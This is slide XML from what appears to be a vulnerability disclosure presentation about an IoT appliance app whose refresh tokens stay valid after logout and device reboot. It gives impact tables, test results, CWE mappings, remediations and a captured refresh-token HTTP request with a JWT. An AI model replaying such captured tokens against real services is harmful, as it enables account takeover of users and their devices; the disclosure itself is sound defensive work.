          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3703352" y="4524375"/>
            <a:ext cx="1034400" cy="2847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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/ferdigul</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="Google Shape;100;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213371" y="4363620"/>
            <a:ext cx="584649" cy="584649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219928" y="4565800"/>
            <a:ext cx="1034400" cy="2847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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>/gulferdi</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="Google Shape;102;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="732362" y="4460522"/>
            <a:ext cx="487557" cy="487557"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Mail icon clipart" id="103" name="Google Shape;103;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6041773" y="4421814"/>
            <a:ext cx="487558" cy="487558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6541050" y="4513600"/>
            <a:ext cx="2068500" cy="2847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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>0xfrd1gul@gmail.com </a:t>
            </a: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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="242" name="Google Shape;242;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1128125" y="1542575"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{16439883-8009-4310-B882-0444342ABA4B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1504950"/>
                <a:gridCol w="4705350"/>
              </a:tblGrid>
              <a:tr h="100000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Category</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="none" cap="none" strike="noStrike">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b="1" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impact Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="none" cap="none" strike="noStrike">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Account Takeover</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Full user access for any attacker capturing a valid refresh token</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Persistence</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Tokens valid across app logouts and device reboots</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Scope</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All users of the app may be impacted</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Attack Feasibility</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Easy in a shared Wi-Fi or proxy-enabled environment (MITM)</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243" name="Google Shape;243;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="461850" y="450250"/>
            <a:ext cx="3000000" cy="1150200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🎯 Impact Analysis</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="249" name="Google Shape;249;p35"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1639500" y="1306200"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{16439883-8009-4310-B882-0444342ABA4B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2200275"/>
                <a:gridCol w="2533650"/>
              </a:tblGrid>
              <a:tr h="292750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Action</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="none" cap="none" strike="noStrike">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b="1" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Result</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="none" cap="none" strike="noStrike">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2750">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User logs out</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000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto Mono"/>
                          <a:ea typeface="Roboto Mono"/>
                          <a:cs typeface="Roboto Mono"/>
                          <a:sym typeface="Roboto Mono"/>
                        </a:rPr>
                        <a:t>refreshToken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> remains valid ❌</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2750">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Device reboot</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Token validity persists ❌</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2750">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Generate new access token</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Success ✅</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2750">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API access with new token</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Authorized ✅</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250" name="Google Shape;250;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314525" y="205325"/>
            <a:ext cx="3000000" cy="1148700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🔁 Logout Test Results</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="256" name="Google Shape;256;p36"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1231250" y="1503375"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{16439883-8009-4310-B882-0444342ABA4B}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="942975"/>
                <a:gridCol w="5334000"/>
              </a:tblGrid>
              <a:tr h="295275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="1200"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CWE ID</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="none" cap="none" strike="noStrike">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b="1" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="00FF00"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200" u="none" cap="none" strike="noStrike">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CWE-287</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Improper Authentication</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CWE-284</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Improper Access Control</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CWE-200</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Exposure of Sensitive Information to an Unauthorized Actor</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CWE-613</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chemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Insufficient Session Expiration (Refresh tokens remain valid post-logout)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" cap="none" strike="noStrike">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257" name="Google Shape;257;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314525" y="255825"/>
            <a:ext cx="3000000" cy="774600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🛡️ Security Classification</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398500" y="918150"/>
            <a:ext cx="8794500" cy="35196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1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🧩 Recommended Remediations</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Invalidate refresh tokens after logout</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Enforce device-based token binding (DeviceID, IP, etc.)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Implement single-use refresh tokens</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Apply strict token expiration and rate limiting</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use secure token revocation mechanisms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25000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>📍 Conclusion</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This vulnerability enables persistent unauthorized access to smart appliances via insecure session handling. Even a low-privileged internal attacker (e.g., someone on the same Wi-Fi) can exploit this flaw to take over accounts and control IoT devices.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152400" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>🛑 Severity: Critical – Immediate remediation is strongly recommended.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447775" y="682675"/>
            <a:ext cx="3798000" cy="327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POST /auth/refresh-token HTTP/2</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Host: api.companyiot.com</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Content-Type: application/json</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Pragma: no-cache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Accept: application/json</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X-NNN-Latitude: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X-Amz-Date: 20250510T174828Z</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X-NNN-Build-Meta: iOS-18.3.1-PH-PROD-STD-3.1.29-P-HOMEWHIZ</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X-NNN-Longitude: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Cache-Control: no-cache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Content-Length: 255</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User-Agent: aws-sdk-iOS/2.40.1 iOS/18.3.1 en_TR</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Accept-Language: en-US,en;q=0.9</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Accept-Encoding: gzip, deflate, br</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X-NNN-Env: LIVE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  "refreshToken": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyZWZyZXNoQ291bnQiOjI1LCJpc3MiOiJjb21wYW55aW90IiwiZGV2aWNlSWQiOi0xMjM0NTY3ODkwMTIzNCwiZW1haWwiOiIweGZyZDFndWxAZ21haWwuY29tIn0.signedpart123",</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  "devicePlatform": "iOS"</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rPr b="1" lang="en" sz="700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>}</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2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
